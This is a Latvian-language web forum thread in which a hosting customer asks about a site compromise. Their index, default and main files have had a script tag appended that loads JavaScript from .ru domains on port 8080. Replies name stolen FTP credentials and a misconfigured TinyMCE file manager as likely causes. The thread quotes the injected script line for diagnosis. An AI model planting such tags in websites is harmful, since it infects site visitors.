Jump to content
php.lv forumi

malware


ebw

Recommended Posts

sveiki!

gadiijusies te taada probleema ka uz mana hostinga dazhiem domeeniem ir sachakareeti faili..

izpauzhas tas taa, ka daudziem index*.*, default*.*, main*.* failiem beigaas (aiz </html> taga) ir piekabinaajies aptuveni sekojoshs kods

 

<script type="text/javascript" src="http://kautkas.ru:8080/kautkas.js"></script>
<!--8469f3ebb36bebb12b39b0f9e7fe5933-->

 

domeni no kura scripts izsaucas ir dazhaadi.. piem. greatrow.ru, moist.ru utt.

gribeeju pajautaat vai kaads ir saskaaries ar liidziigu nelaimi?

cik lasiiju, izskataas ka diezgan modiiga lieta - vismaz aarzemees ir kas no shii liidziiga ir cietushi.

kas vareetu buut pa iemeslu un kaa tas tika paveikts?

 

itkaa cik lasiiju sheit

http://blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/

runa ir par pieejas zagshanu no ftp klientiem.

Link to comment
Share on other sites

Tu vai kāds cits visdrīzāk ir atvēris uzlauztu web lapu, kas ielika drazu kompī. Draza noskanēja saglabātās ftp paroles, aizsūtīja uz midzeni un no midzeņa skripts veic ftp konekcijas un saliek index|default|main html, php un visiem js failiem galā savu vēstījumu.

 

Turklāt, ņemot vērā apjomus, tas visdrīzāk tiek darīts ar directory scan un file append metodēm (diez vai viņi uploado tos failus pie sevis. pašam nebija laika pētīt log failus)

 

P.S. Un MS IE tur ņepričom.

Edited by Mr.Key
Link to comment
Share on other sites

FTP ir tikai viena no iespējām. Es jau šeit esmu rakstījis agrāk ka man līdzīga situācija kādreiz radās. Manā gadījumā problēmu radīja nepareizi sakonfigurēts TinyMCE file manageris, kas strādā kā TinyMCE plugins un kā atsevišķs skripts. Es vienkārši viņam nenomainīju noklusētos autentifikācijas uzstādījumus. Ar to arī modificēja failus.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...